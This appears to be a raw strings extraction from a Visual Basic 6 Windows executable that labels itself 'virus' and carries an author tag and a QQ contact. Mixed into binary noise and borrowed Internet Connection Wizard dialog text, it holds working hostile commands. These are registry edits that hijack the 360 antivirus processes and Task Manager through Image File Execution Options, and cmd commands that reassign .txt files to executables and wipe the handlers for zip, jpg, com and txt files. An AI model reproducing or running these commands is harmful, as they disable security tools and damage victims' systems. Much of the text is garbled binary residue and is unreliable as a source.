#BBBL^B`BdBRichB
`.data
MSVBVM60.DLL
rjrbrrr
rvjrNr:
rrbr*<r}Artr
rr4ur9
r}irWr!NrwrSr+rgr
=r:r7ruBr
Vr2Cr:
rJlrr
rrar5r
r$br/Nrwr
rrpurkrmrIrr0lrF
yE81$HH
M%-:O3f
2.X By:znkzz
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
Timer2
Timer1
Label3
@echo off
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
Label2
Label1
Label1
yE81$H
VB5!6&vb6chs.dll
zE!~@Jke
Class1
yE81$H^pqD
Label1
+3qC:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Timer1
Timer2
Label2
Label3
user32
keybd_event
GetForegroundWindow
user32.dll
GetWindowTextA
GetWindowTextLengthA
FindWindowA
SetWindowTextA
SearchFiles
getCaption
+3q"=h
+3qhJu
+3qClass
C:\windows\SysWow64\MSVBVM60.DLL\3
RegisterA
RegisterB
RegisterC
RegisterD
Md5_String_Calc
Md5_File_Calc
GetValues
MD5Init
MD5Final
MD5Update
LongLeftRotate
__vbaVarSetObjAddref
VBA6.DLL
__vbaStrVarVal
__vbaVarCopy
__vbaStrToUnicode
__vbaStrToAnsi
__vbaSetSystemError
__vbaLsetFixstrFree
__vbaVarForNext
__vbaFpI4
__vbaFPInt
__vbaStrR4
__vbaVarLateMemCallLd
__vbaNew
__vbaVarSetObj
__vbaPutOwner4
__vbaStrVarCopy
__vbaPrintFile
__vbaI2Var
__vbaVarForInit
__vbaFileClose
__vbaGetOwner4
__vbaRedim
__vbaFileOpen
__vbaEnd
__vbaFreeObjList
__vbaNew2
__vbaVarDup
__vbaOnError
__vbaFixstrConstruct
__vbaErrorOverflow
__vbaAryDestruct
__vbaFreeVarList
__vbaAryUnlock
__vbaAryLock
__vbaFreeStrList
__vbaVarTstNe
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSet
__vbaVarMove
__vbaError
__vbaFreeStr
__vbaDerefAry1
__vbaStrCopy
__vbaI4Var
__vbaRedimPreserve
__vbaVarAdd
__vbaLenBstr
__vbaFreeVar
__vbaStrCat
__vbaStrMove
__vbaI2I4
__vbaUI1I2
__vbaAryConstruct2
__vbaFpUI1
__vbaVarCat
__vbaStrVarMove
__vbaUI1I4
__vbaVar2Vec
__vbaGosubFree
__vbaExitProc
__vbaGetOwner3
__vbaGosub
__vbaErase
__vbaLenVarB
__vbaAryMove
__vbaGenerateBoundsError
__vbaStrI4
FileType
SourceString
InFile
InputLen
InputBuffer
}}}}}}}|l\EWEPE
EPlPEPt
MJSEP.PSj
M3EPPu
lXEP@Puy0@X
XP7M)j
tSlPEP
XMfXf9X
#fXEPEPj
EPlPEPt
MSEPPSj
MEPPux
uEPEPj
SEP*L]L9E
MEPHEPEPj
MX|PEPj
} jdh<3@
hPEPEPE
} jPh3@
} jXh3@
MEPEPEPEPj
hPfEhOE
uujj E
MhPEPEPE
HP8P(PPPEP|
P|PEPEP9P
P|PDEPEPP
jj MmE
;PEP7E
PxP8PHP(PP
PPPPPPPP{PxPhPgj
EPXPJ
M9hPxPPPPPPPPP
PHP8PXPhPj
PxPx|x
} jPh3@
} jXh3@
1EPEPEPEPj
EPEPEPEPj
XPhPxPPPPPPPPP
P(P8PHPXPhPj
LSVWeE
VuEPgP3
EPHM`EUM
McM+MS
PEPDEEPE
jTh,3@
jPh,3@
EP@Pu>MDE
SVWeEP
SVWeE`
M_h6]@
SVWeEp
MKhJ^@
TSVWeE
]]]]P8;}
VPHEPEP
P$MQMQE
j@WVPM
MQVP4;}
UM]h_@
EP3S#EPS
j\XXSVWeE
PPuVj@YE
M/M'MO
HSVWeE
VEPEP}}}
EWEPEP+P
WVEPEP]E
MJEPEP
3EPEPj
4SVWeE
QV}}}}
QVPLuuB
EPEPEPEPEPEPj
EPEPEPEPEPEPj
E_EEPE
P]}u-EPEPEP"P"
MEPEPj
>EEEPE
Es^uS'EEEEPEP}u;EPEPEP0P0
MEPEPEPj
EEEEPEP}uEPEPEP
EEEEPEP}u1EPEPEP&P&
MEPEPEPj
EEEEPEP}u
EPEPEP
EEPEP}u
EPEPEP
EPEPEPj
EEPEP}unEPEPEPcPc
M)EPEPj
EPEPEPj
SVWeE0
MQMQ}}]V}~PPp
MQMQVPp
MQMQVPp
MQMQVPpFDMH
XSVWeE8
EP]]]]
EEj@_]E
jxX+MQM
MQMQVPpM
MQMQVPpE]E=
MQMQVPpE]E=
MQMQVPpE]E=
MQMEQE
VPOhl@
LSVWeEH
NPj@_e
f;EE~]
E\f;EE
VPPfEf
HSVWeEP
EEEEEEEEh9@
MQEMEQE
MQMQMQu
MQMQMQMQVExjE
MQMQMQM
QMQMQMQMQEVE
MQMQMQM
QMQMQMQMQVEp $]PXj
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME*
QMQMQMQMQVPX
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVPX
MQMQMQM
(QMQMQMQMQVE[]PX
MQMQMQM
,QMQMQMQMQVE\}PX
MQMQMQM
0QMQMQME"
QMQVPX
MQMQMQM
4QMQMQMQMQVEqE
MQMQMQM
8QMQMQMQMQVECy]PX
MQMQMQM
<QMQMQMQMQVE!
MQMQMQMEb%
QMQMQMQMQVP\
MQMQMQM
QMQMQMQMQVE@@E
MQMQMQM
,QMQMQMQMQVEQZ^&]P\j
MQMQMQu
MQMQMQMQVE
MQMQMQM
QMQMQMQMQVP\
MQMQMQM
(QMQMQMQMQVES
MQMQMQM
<QMQMQMQMQVE
MQMQMQM
QMQMQE}MQMQVP\
MQMQMQM
$QMQMQMQMQVE!E
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME
ZE} QMQMQMQMQVP\
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVEE
MQMQMQM
QMQMQMQMQVE
EL*}MQMQMQM
0QMQMQMQMQVP\j
MQMQMQM
QMQMQMQMQVEB9]P`
MQMQMQM
QMQMQMQMQVEqE
_MQMQMQM
,QME"am}QMQMQMQVP`
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVED
MQMQMQM
QMQMQMQMQVEKE
MQME`K}QMQM
QMQMQMQMQVP`
MQMQMQM
(QMQMQMQMQVEpE
MQMQMQM
4QMQMQMQMQVE~(]P`
MQMQMQu
MQMQMQMQVE'E
MQMQMQM
QMQMQMQMQVP`
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVE9
MQMQMQM
0QMQMQEE
MQMQVP`
MQMQMQM
<QMQMQMQMQVE|}P`
MQMQMQM
QMQMQMQMQVEeVE
MQMQMQu
MQMQMQMQVED")E
MQMQMQM
QMQMQMQMQVPd
MQMQMQM
8QMQMQMQMQVE#E
MQMQMQM
QMQMQMQMQVE9E
MQMQMQM
0QMQMQMQMQVEY[eE
QMQMQM
QMQMQMQMQVPd
MQMQMQM
(QMQMQMQMQVE}E
MQMQMQM
QMQMQMQMQVE]E
MQMQMQM
QMQMQMQMEO~oE
MQMQMQM
<QMQMQMQMQVE,E
MQMQMQM
QMQMQMQMQVE
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
MQMQMQMQVPd
MQMQMQM
,QMQMQMQMQVE5:E
MQMQMQM
QMQMQMQMQVE*E
MQMQMQM
$QMQMQMQMQVE
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
S3Wf8f
f;]]]]
QWVPlEM
QWVPlEM
QWVPlEM
QWVPlEM
SVWeE`
V3EEEE
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaError
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaVarForInit
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaErase
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaPutOwner4
__vbaI2I4
DllFunctionCall
__vbaFpUI1
__vbaRedimPreserve
__vbaStrR4
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
EVENT_SINK_Release
__vbaNew
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaUI1I4
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaGetOwner3
__vbaStrVarVal
__vbaVarCat
__vbaGetOwner4
__vbaI2Var
__vbaLsetFixstrFree
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaVar2Vec
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaVarSetObj
__vbaFreeStrList
__vbaDerefAry1
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarTstNe
__vbaI4Var
__vbaVarAdd
__vbaAryLock
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaFpI4
__vbaVarCopy
__vbaVarSetObjAddref
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
__vbaLenVarB
_CItan
__vbaAryUnlock
__vbaFPInt
__vbaVarForNext
_CIexp
__vbaFreeStr
__vbaFreeObj
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
C:\Users\Administrator\Desktop\
2.X.pdb
49431AAD794634219A639C6C541A3D96
E8A7EA76E1854769DE340A9B8C435D05
78493ED5434848C66C6270A8C3C17E8F
96782471E1F42F0E5192DEF8D34ADF52
62A15B7205C4F5C57A85B0D3069C33A9
9FFC7CA89A523E8929336726D7773437
D3436C5275093FAF2564D1686B09A90D
E3338793698E1606AF47D324D912D726
EC9586D14581D3BBA0F9E75718021738
D82B5A5B70E0FDEB799FE2F9ACF76564
L!This program cannot be run in DOS mode.
#BBBL^B`BdBRichB
`.data
MSVBVM60.DLL
rjrbrrr
rvjrNr:
rrbr*<r}Artr
rr4ur9
r}irWr!NrwrSr+rgr
=r:r7ruBr
Vr2Cr:
rJlrr
rrar5r
r$br/Nrwr
rrpurkrmrIrr0lrF
yE81$HH
M%-:O3f
2.X By:znkzz
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
Timer2
Timer1
Label3
@echo off
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
Label2
Label1
Label1
yE81$H
VB5!6&vb6chs.dll
zE!~@Jke
Class1
yE81$H^pqD
Label1
+3qC:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Timer1
Timer2
Label2
Label3
user32
keybd_event
GetForegroundWindow
user32.dll
GetWindowTextA
GetWindowTextLengthA
FindWindowA
SetWindowTextA
SearchFiles
getCaption
+3q"=h
+3qhJu
+3qClass
C:\windows\SysWow64\MSVBVM60.DLL\3
RegisterA
RegisterB
RegisterC
RegisterD
Md5_String_Calc
Md5_File_Calc
GetValues
MD5Init
MD5Final
MD5Update
LongLeftRotate
__vbaVarSetObjAddref
VBA6.DLL
__vbaStrVarVal
__vbaVarCopy
__vbaStrToUnicode
__vbaStrToAnsi
__vbaSetSystemError
__vbaLsetFixstrFree
__vbaVarForNext
__vbaFpI4
__vbaFPInt
__vbaStrR4
__vbaVarLateMemCallLd
__vbaNew
__vbaVarSetObj
__vbaPutOwner4
__vbaStrVarCopy
__vbaPrintFile
__vbaI2Var
__vbaVarForInit
__vbaFileClose
__vbaGetOwner4
__vbaRedim
__vbaFileOpen
__vbaEnd
__vbaFreeObjList
__vbaNew2
__vbaVarDup
__vbaOnError
__vbaFixstrConstruct
__vbaErrorOverflow
__vbaAryDestruct
__vbaFreeVarList
__vbaAryUnlock
__vbaAryLock
__vbaFreeStrList
__vbaVarTstNe
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSet
__vbaVarMove
__vbaError
__vbaFreeStr
__vbaDerefAry1
__vbaStrCopy
__vbaI4Var
__vbaRedimPreserve
__vbaVarAdd
__vbaLenBstr
__vbaFreeVar
__vbaStrCat
__vbaStrMove
__vbaI2I4
__vbaUI1I2
__vbaAryConstruct2
__vbaFpUI1
__vbaVarCat
__vbaStrVarMove
__vbaUI1I4
__vbaVar2Vec
__vbaGosubFree
__vbaExitProc
__vbaGetOwner3
__vbaGosub
__vbaErase
__vbaLenVarB
__vbaAryMove
__vbaGenerateBoundsError
__vbaStrI4
FileType
SourceString
InFile
InputLen
InputBuffer
}}}}}}}|l\EWEPE
EPlPEPt
MJSEP.PSj
M3EPPu
lXEP@Puy0@X
XP7M)j
tSlPEP
XMfXf9X
#fXEPEPj
EPlPEPt
MSEPPSj
MEPPux
uEPEPj
SEP*L]L9E
MEPHEPEPj
MX|PEPj
} jdh<3@
hPEPEPE
} jPh3@
} jXh3@
MEPEPEPEPj
hPfEhOE
uujj E
MhPEPEPE
HP8P(PPPEP|
P|PEPEP9P
P|PDEPEPP
jj MmE
;PEP7E
PxP8PHP(PP
PPPPPPPP{PxPhPgj
EPXPJ
M9hPxPPPPPPPPP
PHP8PXPhPj
PxPx|x
} jPh3@
} jXh3@
1EPEPEPEPj
EPEPEPEPj
XPhPxPPPPPPPPP
P(P8PHPXPhPj
LSVWeE
VuEPgP3
EPHM`EUM
McM+MS
PEPDEEPE
jTh,3@
jPh,3@
EP@Pu>MDE
SVWeEP
SVWeE`
M_h6]@
SVWeEp
MKhJ^@
TSVWeE
]]]]P8;}
VPHEPEP
P$MQMQE
j@WVPM
MQVP4;}
UM]h_@
EP3S#EPS
j\XXSVWeE
PPuVj@YE
M/M'MO
HSVWeE
VEPEP}}}
EWEPEP+P
WVEPEP]E
MJEPEP
3EPEPj
4SVWeE
QV}}}}
QVPLuuB
EPEPEPEPEPEPj
EPEPEPEPEPEPj
E_EEPE
P]}u-EPEPEP"P"
MEPEPj
>EEEPE
Es^uS'EEEEPEP}u;EPEPEP0P0
MEPEPEPj
EEEEPEP}uEPEPEP
EEEEPEP}u1EPEPEP&P&
MEPEPEPj
EEEEPEP}u
EPEPEP
EEPEP}u
EPEPEP
EPEPEPj
EEPEP}unEPEPEPcPc
M)EPEPj
EPEPEPj
SVWeE0
MQMQ}}]V}~PPp
MQMQVPp
MQMQVPp
MQMQVPpFDMH
XSVWeE8
EP]]]]
EEj@_]E
jxX+MQM
MQMQVPpM
MQMQVPpE]E=
MQMQVPpE]E=
MQMQVPpE]E=
MQMEQE
VPOhl@
LSVWeEH
NPj@_e
f;EE~]
E\f;EE
VPPfEf
HSVWeEP
EEEEEEEEh9@
MQEMEQE
MQMQMQu
MQMQMQMQVExjE
MQMQMQM
QMQMQMQMQEVE
MQMQMQM
QMQMQMQMQVEp $]PXj
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME*
QMQMQMQMQVPX
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVPX
MQMQMQM
(QMQMQMQMQVE[]PX
MQMQMQM
,QMQMQMQMQVE\}PX
MQMQMQM
0QMQMQME"
QMQVPX
MQMQMQM
4QMQMQMQMQVEqE
MQMQMQM
8QMQMQMQMQVECy]PX
MQMQMQM
<QMQMQMQMQVE!
MQMQMQMEb%
QMQMQMQMQVP\
MQMQMQM
QMQMQMQMQVE@@E
MQMQMQM
,QMQMQMQMQVEQZ^&]P\j
MQMQMQu
MQMQMQMQVE
MQMQMQM
QMQMQMQMQVP\
MQMQMQM
(QMQMQMQMQVES
MQMQMQM
<QMQMQMQMQVE
MQMQMQM
QMQMQE}MQMQVP\
MQMQMQM
$QMQMQMQMQVE!E
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME
ZE} QMQMQMQMQVP\
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVEE
MQMQMQM
QMQMQMQMQVE
EL*}MQMQMQM
0QMQMQMQMQVP\j
MQMQMQM
QMQMQMQMQVEB9]P`
MQMQMQM
QMQMQMQMQVEqE
_MQMQMQM
,QME"am}QMQMQMQVP`
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVED
MQMQMQM
QMQMQMQMQVEKE
MQME`K}QMQM
QMQMQMQMQVP`
MQMQMQM
(QMQMQMQMQVEpE
MQMQMQM
4QMQMQMQMQVE~(]P`
MQMQMQu
MQMQMQMQVE'E
MQMQMQM
QMQMQMQMQVP`
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVE9
MQMQMQM
0QMQMQEE
MQMQVP`
MQMQMQM
<QMQMQMQMQVE|}P`
MQMQMQM
QMQMQMQMQVEeVE
MQMQMQu
MQMQMQMQVED")E
MQMQMQM
QMQMQMQMQVPd
MQMQMQM
8QMQMQMQMQVE#E
MQMQMQM
QMQMQMQMQVE9E
MQMQMQM
0QMQMQMQMQVEY[eE
QMQMQM
QMQMQMQMQVPd
MQMQMQM
(QMQMQMQMQVE}E
MQMQMQM
QMQMQMQMQVE]E
MQMQMQM
QMQMQMQMEO~oE
MQMQMQM
<QMQMQMQMQVE,E
MQMQMQM
QMQMQMQMQVE
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
MQMQMQMQVPd
MQMQMQM
,QMQMQMQMQVE5:E
MQMQMQM
QMQMQMQMQVE*E
MQMQMQM
$QMQMQMQMQVE
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
S3Wf8f
f;]]]]
QWVPlEM
QWVPlEM
QWVPlEM
QWVPlEM
SVWeE`
V3EEEE
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaError
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaVarForInit
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaErase
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaPutOwner4
__vbaI2I4
DllFunctionCall
__vbaFpUI1
__vbaRedimPreserve
__vbaStrR4
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
EVENT_SINK_Release
__vbaNew
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaUI1I4
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaGetOwner3
__vbaStrVarVal
__vbaVarCat
__vbaGetOwner4
__vbaI2Var
__vbaLsetFixstrFree
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaVar2Vec
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaVarSetObj
__vbaFreeStrList
__vbaDerefAry1
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarTstNe
__vbaI4Var
__vbaVarAdd
__vbaAryLock
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaFpI4
__vbaVarCopy
__vbaVarSetObjAddref
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
__vbaLenVarB
_CItan
__vbaAryUnlock
__vbaFPInt
__vbaVarForNext
_CIexp
__vbaFreeStr
__vbaFreeObj
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
C:\Users\Administrator\Desktop\
2.X.pdb
49431AAD794634219A639C6C541A3D96
E8A7EA76E1854769DE340A9B8C435D05
78493ED5434848C66C6270A8C3C17E8F
96782471E1F42F0E5192DEF8D34ADF52
62A15B7205C4F5C57A85B0D3069C33A9
9FFC7CA89A523E8929336726D7773437
D3436C5275093FAF2564D1686B09A90D
E3338793698E1606AF47D324D912D726
EC9586D14581D3BBA0F9E75718021738
F624FE817F1D2ACA80FF8A9AF214D178
464884A5BB67C85A9A64E636C1DB332F
0C6D6F783070152ABDA0C643E67D0EA8
CF810F2694B570866769FDCE86CEB720
02E69289EF0A787065DE020B31261396
FF4D40671D287F6916860C0EA13FC348
2045C3A92E4900F5F4FF085BA2A08646
F97FFC674F49416CA44306747CE7ED28
DDDDDDDDDDDDDDDDDDDDDvvvDDDDDggdDDDDDDDFvvvDDDDDDDDDDDDDDFDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDgggllllDDDDDvvtDDDDDDDDggglllldDDDDDDDDDDDDDDLlllldDDDDDDDD
vvvgglvvv
DDDDDDDDDDDDDDDDDDDDDDgggllllldDDDDvvtDDDDDDDDDgggllllDDDDDDDDDDDDDDLlllldDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDvvDDDDggdDDDDDDDDDFvvvDDDDDDDDDDDDDFDDDDDDDD
glvv|gg
DDDDDDDDDDDDDDDDDDDDDDDDDDDggdDDDDDDDDDDFvDDDDDDDDDDDDDFDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDLlllllldDDvvtDDDDDDDDDDDlllllldDDDDDDDDDDDDLlllldDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDlllllllDDvvtDDDDDDDDDDDLllllllDDDDDDDDDDDDLlllldDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDFDggdDDDDDDDDDDDFDDDDDDDDDDDDFDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDFggdDDDDDDDDDDDDFDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDLlllllllvvtDDDDDDDDDDDDLllllllDDDDDLllllllllllllllllDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDLllllllvvtDDDDDDDDDDDDDlllllldLlllllllllllllllllllllll
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDggdDDDDDDDDDDDDDF
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDggfDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLllllvdDDDDDDDDDDDDDLlllllllllllllllllllllllllllll
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLllllllllDDDDDDDDDDDlllllllllllllllllllllllllllllll
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDFDDDDDFDDDDF
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLlllllllllDDDDLllllllllllllldDDDDDDLlllldDDDDDDll
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDllllllllldDllllllllllllllllDDDDDDLlllldDDDDDLll
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDFDDDDDFDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDFDFDDDDFDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLllllllllllllllldDDLlllllllDDDDLlllldDDDLllll
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDlllllllllllldDDDDDLlllllllDDDLlllldDDLlllll
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDFDDDDDDDDFDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDFD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDllllllllllllldDDDLlllllllDLlllldLlllllll
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLlllllllllllllllDLllllllllllllllllllllL
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDF
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDF
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLllllllllllllllllllllllllllllllllll
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDllllllllllllllllllllllllllllllll
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDF
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDF
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLlllllllllllllllllllllllll
E109692A847103AA164E11256C9CFD08
A191EB17237F942BA89E4CDD586AACA6
D2ED05E670ECC1AAAA041702F5F0407D
F22FB7672C5B8B7B7B7B11AC2C0B08F7
cmd.exe
Md5_String_Calc
C:\123.bat
cmd.exe /c assoc .txt = exefile
cmd.exe /c ftype comfile=
cmd.exe /c ftype zipfile=
cmd.exe /c ftype jpgfile=
cmd.exe /c ftype txtfile=
znkzz
virus QQ 621370902
VS_VERSION_INFO
StringFileInfo
080404B0
CompanyName
FileDescription
LegalCopyright
LegalTrademarks
ProductName
FileVersion
ProductVersion
InternalName
OriginalFilename
VarFileInfo
Translation
cmd.exe
Md5_String_Calc
C:\123.bat
cmd.exe /c assoc .txt = exefile
cmd.exe /c ftype comfile=
cmd.exe /c ftype zipfile=
cmd.exe /c ftype jpgfile=
cmd.exe /c ftype txtfile=
znkzz
virus QQ 621370902
VS_VERSION_INFO
StringFileInfo
080404B0
CompanyName
FileDescription
LegalCopyright
LegalTrademarks
ProductName
FileVersion
ProductVersion
InternalName
OriginalFilename
VarFileInfo
Translation
cmd.exe
Md5_String_Calc
C:\123.bat
cmd.exe /c assoc .txt = exefile
cmd.exe /c ftype comfile=
cmd.exe /c ftype zipfile=
cmd.exe /c ftype jpgfile=
cmd.exe /c ftype txtfile=
znkzz
virus QQ 621370902
VS_VERSION_INFO
StringFileInfo
080404B0
CompanyName
FileDescription
LegalCopyright
LegalTrademarks
ProductName
FileVersion
ProductVersion
InternalName
OriginalFilename
VarFileInfo
Translation
cmd.exe
Md5_String_Calc
C:\123.bat
cmd.exe /c assoc .txt = exefile
cmd.exe /c ftype comfile=
cmd.exe /c ftype zipfile=
cmd.exe /c ftype jpgfile=
cmd.exe /c ftype txtfile=
znkzz
virus QQ 621370902
VS_VERSION_INFO
StringFileInfo
080404B0
CompanyName
FileDescription
LegalCopyright
LegalTrademarks
ProductName
FileVersion
ProductVersion
InternalName
OriginalFilename
VarFileInfo
Translation
Internet Connection Wizard
MS Shell Dlg
Internet Connection Wizard
MS Shell Dlg
&Create a new Internet account
&Use my account with another Internet service provider (ISP)
&Manually configure my telephone or network Internet connection
Select this option if this computer's modem is connected to your phone line, and you want a new Internet account.
Select this option if you already have an Internet account, even if you've never connected to the Internet from your own computer.
Select this option if you know your connection settings such as your ISP phone number. These settings are available from your ISP or your network administrator.
Internet Connection Wizard
Whether you've never had an Internet account, or you had an account for another computer, we'll help you set up this computer for Internet access.
How will this computer connect to the Internet?
To leave your Internet settings unchanged, click Cancel.
Internet Connection Wizard
MS Shell Dlg
Internet Connection Wizard
MS Shell Dlg
Welcome to the Internet Connection Wizard
The Internet Connection wizard helps you connect your computer to the Internet. You can use this wizard to create a new account with an Internet service provider for your Small Business Server.
Click Next to continue.
Internet Connection Wizard
MS Shell Dlg
Whether you've never had an Internet account, or you had an account for another computer, we'll help you set up this computer for Internet access.
&Create a new Internet account
&Manually configure my telephone or network Internet connection
&Use my account with another Internet service provider (ISP)
Select this option if this computer's modem is connected to your phone line, and you want a new Internet account.
Select this option if you already have an Internet account, even if you've never connected to the Internet from your own computer.
Select this option if you know your connection settings such as your ISP phone number. These settings are available from your ISP or your network administrator.
Internet Connection Wizard
MS Shell Dlg
ICW_STATIC
How do you connect to the Internet?
I connect through a &phone line and a modem
I connect through a &local area network (LAN)
Internet Connection Wizard
MS Shell Dlg
